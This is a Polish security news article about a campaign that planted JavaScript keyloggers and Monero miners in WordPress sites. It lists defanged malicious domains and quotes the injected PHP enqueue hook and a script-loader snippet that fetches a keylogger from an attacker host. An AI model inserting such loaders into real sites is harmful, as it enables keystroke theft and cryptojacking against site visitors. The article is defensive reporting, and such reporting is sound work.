Tysiące stron WordPress pobiera keyloggery JavaScript i kopie Monero

29 stycznia, 2018

Na razie mowa nawet o kilkuset stronach internetowych napędzanych WordPressem, które infekowane były złośliwym skryptem i ładowały z zewnętrznej domeny niebezpieczny JavaScript, który z kolei rejestrował wpisywane przez użytkownika dane w pola tekstowe na stronach internetowych. O kilkuset zainfekowanych witrynach wspominają eksperci z Sucuri. Niestety ów wektor dystrybucji złośliwego kodu był już zauważony w kwietniu 2017. Od tego czasu z kilkoma zmianami w domenach TLD (z nich zainfekowana strona ładowała kod JavaScript) i różnymi metodami zaciemniania kodu zdołano zainfekować kilka tysięcy instancji WordPressów, które kopały krypto-walutę Monero oraz służyły za „przeglądarkowego” keyloggera.

Domeny z których pobierano złośliwe biblioteki JavaScript:

hxxps://cdjs[.]online/lib.js
hxxps://cdjs[.]online/lib.js?ver=…
hxxps://cdns[.]ws/lib/googleanalytics.js?ver=…
hxxps://msdns[.]online/lib/mnngldr.js?ver=…
hxxps://msdns[.]online/lib/klldr.js //“keylogger loader”
hxxps://msdns[.]online/lib/kl.js //“keylogger loader”

Skrypty keyloggerów lub koparek Monero z domeny np. cdjs[.]online mogą być wstrzykiwane do bazy danych do tabeli „wp_posts” lub do pliku „functions.php”. Dzieje się tak na skutek dziurawej instancji WordPressa — luki we wtyczkach, samym rdzeniu WP, niewłaściwie zabezpieczonego serwera Apache, Nginx, czy też usługi SSH/FTP.

function chmnr_klgr_enqueue_script() {
wp_enqueue_script( 'chmnr_klgr-js', 'hxxps://cdns[.]ws/lib/googleanalytics.js', false );

wp

Domena „Cloudflare[.]solutions” została zablokowana przez dostawców wyszukiwarek (Google i Firefox, który korzysta z API Google do wykrywania złośliwych stron) i usunięta kilka dni po tym, jak badacze w grudniu 2017 roku opublikowali swoje odkrycie. Nie trzeba było długo czekać, aby przestępcy szybko zarejestrowali kilka nowych domen, które pobierały złośliwe biblioteki i które z kolei uruchamiały kod ładujący keyloggera lub koparkę Monero opracowaną przez firmę CoinHive, specjalizująca się w dostarczaniu takich usług internetowych:  

var snf = document.createElement("script");
snf.type = "text/javascript";
snf.setAttribute("defer", "defer");
snf.src = "hxxps://msdns[.]online/lib/kl.js";
document.head.appendChild(snf);

Administratorom blogów mniejszych i większych zalecamy, aby przyjrzeli się swoim stronom internetowym pod kątem złośliwych skryptów. Najlepiej zrobić to za pomocą wbudowanych w przeglądarki narzędzi deweloperskich lub posłużyć się poradnikiem rekomendowanym przez Sucuri lub przez polską firmę Webanti, która dostarcza gotowe narzędzia do ochrony w czasie rzeczywistym / skanowania stron internetowych.

Do infekcji dochodzi na skutek luk w oprogramowaniu, dlatego warto już teraz przeprowadzić aktualizację rdzenia, modułów, przejrzeć plik „functions.php” oraz pozmieniać wszystkie dostępowe hasła do panelu administratora, a także usług na serwerze.

Czy ten artykuł był pomocny?

Oceniono: 0 razy

Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.
Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.

PODZIEL SIĘ:

guest
0 komentarzy
najstarszy
najnowszy oceniany
Inline Feedbacks
View all comments

Zapisz się na newsletter

Informacje o cyberbezpieczeństwie prosto na skrzynkę pocztową!

Dodatkowo otrzymasz poradnik „Jak bezpiecznie funkcjonować w cyfrowym świecie”

Wyrażam zgodę na przesłanie oferty drogą telefoniczną przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

Wyrażam zgodę na przesłanie oferty drogą mailową przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

[ninja_tables id=”27481″]